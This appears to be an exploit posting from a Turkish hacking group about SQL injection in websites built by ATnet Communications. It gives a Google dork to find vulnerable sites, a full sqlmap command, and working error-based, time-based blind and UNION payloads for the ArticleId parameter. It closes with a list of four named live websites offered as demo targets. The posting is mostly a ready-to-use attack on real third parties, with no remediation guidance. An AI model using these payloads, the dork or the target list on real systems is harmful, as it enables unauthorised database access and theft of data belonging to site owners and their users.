#################################################################################
# Exploit Title:ATnet Communications Sql İnjection Vulnerability
# Author : TrazeR & Sipahiler & TurkZ.org
# Google Dork : intext:"Κατασκευή ιστοσελίδων: ATnet Communications Α.Ε." inurl:ArticleId=
# Tested on : Kali Linux 2018.1
# Date : 10.03.2018
# Vendor Home: https://www.atnet.gr/
# Blog : http://www.trazer.org/
# Forum : http://www.turkz.org/Forum/
# Telegram: https://t.me/turkzgrup
#################################################################################
Tutorial :
[+] Dorking İn Google Or Other Search Enggine
[+] Sqlmap Or Manuel
[+] Sql GET Parameter "ArticleId" İs Vulnerable
[+] The Back-End DBMS is MySQL
Command:root@TrazeR:~# sqlmap --timeout=10 --threads=10 --time-sec=2 --random-agent --level=5 --risk=3 --ignore-proxy --no-cast -u "http://78-45.gr/Article.php?PageId=1&ArticleId=" --batch --dbs
Parameter: ArticleId (GET)
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
Payload: PageId=1&ArticleId=-7597 OR 1 GROUP BY CONCAT(0x71786a6b71,(SELECT (CASE WHEN (6295=6295) THEN 1 ELSE 0 END)),0x717a766b71,FLOOR(RAND(0)*2)) HAVING MIN(0)#
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: PageId=1&ArticleId=(CASE WHEN (6003=6003) THEN SLEEP(2) ELSE 6003 END)
Type: UNION query
Title: Generic UNION query (random number) - 18 columns
Payload: PageId=1&ArticleId=-6785 UNION ALL SELECT 6538,6538,6538,6538,6538,6538,6538,6538,CONCAT(0x71786a6b71,0x5253675362784f4f6a5a79476148654b786d5a6b53645a6d44444863617478427458444c527a5a47,0x717a766b71),6538,6538,6538,6538,6538,6538,6538,6538,6538-- kbxR
Demo Sql:
http://78-45.gr/Article.php?PageId=1&ArticleId=
http://alamano.gr/Article.php?PageId=1&ArticleId=14
http://envirochem.gr/Article.php?PageId=87&ArticleId=1&Language=el
http://dknotary.gr/Article.php?PageId=137&ArticleId=642&Language=en
Greet'Zzz :TrazeR & Zer0day & Göcebe & Kutluhan & R4PTOR
